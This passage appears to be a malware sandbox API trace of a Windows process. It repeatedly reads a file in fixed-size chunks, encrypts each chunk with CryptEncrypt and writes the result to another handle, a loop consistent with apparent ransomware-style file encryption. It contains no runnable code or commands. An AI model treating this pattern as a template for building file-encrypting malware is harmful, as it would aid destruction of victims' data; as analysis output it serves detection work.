| out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.513] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.513] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.513] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.513] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.513] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.513] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.513] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.513] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.513] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.513] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.514] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.514] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.514] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.514] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.514] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.514] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.514] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.514] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.514] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.514] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.514] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.514] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.514] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.514] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.514] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.514] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.514] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.514] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.515] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.515] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.515] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.515] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.515] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.515] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.515] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.515] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.515] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.515] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.515] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.515] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.515] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.515] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.515] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.515] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.515] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.516] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.516] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.516] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.516] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.516] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.516] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.516] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.516] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.516] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.516] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.516] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.516] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.516] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.516] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.516] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.517] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.517] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.517] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.517] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.517] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.517] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.517] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.517] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.517] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.517] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.517] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.517] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.517] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.517] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.517] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.517] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.517] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.517] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.517] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.517] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.518] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.518] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.518] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.518] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.518] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.518] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.518] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.518] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.518] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.518] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.518] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.518] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.518] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.518] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.518] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.518] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.518] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.518] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.519] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.519] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.519] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.519] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.519] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.519] CryptEncrypt (in: hKey=0x2e7fd40, 